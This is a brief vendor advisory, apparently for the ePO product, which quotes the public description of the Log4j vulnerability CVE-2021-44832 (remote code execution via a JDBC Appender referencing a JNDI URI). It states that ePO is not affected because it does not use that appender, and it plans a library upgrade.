This statement addresses concerns about ePO and the Log4j vulnerability documented in CVE-2021-44832.
MITRE CVE-2021-44832
CVE-2021-44832
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI.
Research and Conclusions
No version of ePO implements the JDBC Appender. So, ePO isn’t vulnerable to CVE-2021-44832. But, we'll increment our Log4j library to version 2.17.1 or later in a future update.